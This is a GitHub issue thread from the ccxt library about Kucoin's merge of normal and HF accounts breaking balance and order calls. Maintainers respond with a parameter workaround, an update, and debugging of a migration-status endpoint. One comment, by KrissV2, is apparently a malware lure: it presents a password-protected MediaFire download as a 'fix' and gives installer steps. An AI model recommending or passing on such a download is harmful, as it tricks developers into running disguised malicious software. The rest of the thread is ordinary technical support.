### ISSUE TITLE
Kucoin merge hf accounts

### ISSUE THREAD

**Issue by iht76** [ccxt/ccxt#23575]
### CCXT Version

4.3.90

### Description

with the new changes Kucoin made (merging normal and hf accounts) things brake and do not work as expected .... fetching balances, fetching orders etc.
### Code

```
  

```

**Comment by carlosmiei** [comment]
Hello @iht76,  thanks for reporting it, we will take a look

**Comment by carlosmiei** [comment]
@iht76 While we work on a fix, can you please provide `hf: True` in `params` ?

**Comment by carlosmiei** [comment]
Example: `kucoin.fetch_balance(params={'hf': True})`

**Comment by ttodua** [comment]
@iht76 please update your ccxt and test it out, then let us know if that fixed your case.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by igor-vovk** [comment]
Hi! After updating from `v4.3.88` to `v4.3.93` `fetchBalances` started returning an empty array. Setting `options.hfMigrated` to `false` helps. It seems for me that hf check doesn't work properly for me. Will be happy to provide any additional details.

**Comment by carlosmiei** [comment]
Hello @igor-vovk, can you please post the output of this call? `kucoin.privateGetMigrateUserAccountStatus()`

**Comment by igor-vovk** [comment]
Returned result is:
```
{ code: '200000', data: { status: 2 } }
```

**Comment by igor-vovk** [comment]
@carlosmiei thank you! Totally not a problem for me, just decided that someone can stumble on this as well so it will be handy.
